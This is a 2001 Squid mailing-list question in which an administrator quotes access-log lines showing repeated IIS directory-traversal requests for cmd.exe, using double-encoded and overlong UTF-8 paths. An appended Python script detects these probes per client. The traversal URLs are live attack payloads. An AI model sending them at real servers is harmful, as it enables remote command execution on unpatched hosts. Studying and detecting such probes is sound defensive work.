[squid-users] WinNT Server Access Problem

From: Arvin V. Carlos <spaceman@dont-contact.us>
Date: Wed, 19 Sep 2001 10:33:12 +0800 (PHT)

We have two NT 4.0 machines running IIS. Suddenly our Squid went down because of
a disk space problem. We checked our log files, and they eat our disk space
because our NT machines try to resolve this all the time:

255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.455 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.487 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -
1000866350.496 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/d/winnt/system32/cmd.exe? - DIRECT/www -
1000866350.505 2 208.142.136.115 TCP_MISS/503 1200 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.514 2 208.142.136.115 TCP_MISS/503 1242 GET http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.530 1 208.142.136.115 TCP_MISS/503 1242 GET http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.539 2 208.142.136.115 TCP_MISS/503 1299 GET http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.548 2 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.557 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -

Can anyone explain this? Is this a virus? Please HELP!!!

-- 
===============================================================================
Arvin V. Carlos				  Office Phone: 
Linux System Administrator		  (047)237-6001/237-6002
Pccomshop Inc.		  		  http://www.pccomshop.com
                  -- Some people are afraid of nothing! --
===============================================================================
Received on Tue Sep 18 2001 - 20:49:48 MDT
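
One way to find which clients are filling the log with requests like those above, shown as an added example that is not part of the original post: the script reads Squid native access.log lines, flags URLs that reach for cmd.exe or carry the %255c / %c0 / %c1 encodings seen in the post, and totals hits and bytes per client. The field positions assume the native log format; the sample lines are constructed from the post's entries, plus one constructed benign line from 192.0.2.10.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample, modelled on the access.log entries quoted in the post.
SAMPLE_LOG = """\
1000866350.455 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.487 1 208.142.136.115 TCP_MISS/503 1168 GET http://www/c/winnt/system32/cmd.exe? - DIRECT/www -
1000866350.505 2 208.142.136.115 TCP_MISS/503 1200 GET http://www/scripts/..%255c../winnt/system32/cmd.exe? - DIRECT/www -
1000866350.557 1 208.142.136.115 TCP_MISS/503 1202 GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe? - DIRECT/www -
1000866351.100 35 192.0.2.10 TCP_MISS/200 5120 GET http://www.example.com/index.html - DIRECT/192.0.2.80 text/html
"""

CMD_RX = re.compile(r"[/\\]winnt[/\\]system32[/\\]cmd\.exe", re.I)
DOUBLE_RX = re.compile(r"%25[0-9a-f]{2}", re.I)         # "%255c" decodes to "%5c", then "\"
OVERLONG_RX = re.compile(r"%c[01]%[0-9a-f]{2}", re.I)   # 0xC0/0xC1 never start valid UTF-8


def classify(url):
    """Return the reasons a URL looks like one of the probes in the post."""
    # Decode twice (latin-1 keeps every byte) so a double-encoded path is still seen.
    decoded = unquote(unquote(url, encoding="latin-1"), encoding="latin-1")
    reasons = []
    if CMD_RX.search(decoded):
        reasons.append("cmd.exe")
    if DOUBLE_RX.search(url):   # heuristic: can also match a harmless "%2520"
        reasons.append("double-encoding")
    if OVERLONG_RX.search(url):
        reasons.append("overlong-utf8")
    return reasons


def summarize(log_text):
    """Map each client IP to (flagged requests, bytes sent for them)."""
    hits, size = Counter(), Counter()
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 7:     # truncated or wrapped entry, skip it
            continue
        client, nbytes, url = fields[2], fields[4], fields[6]
        if classify(url):
            hits[client] += 1
            size[client] += int(nbytes) if nbytes.isdigit() else 0
    return {client: (hits[client], size[client]) for client in hits}


if __name__ == "__main__":
    for client, (count, total) in summarize(SAMPLE_LOG).items():
        print(f"{client}: {count} flagged requests, {total} bytes")
```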
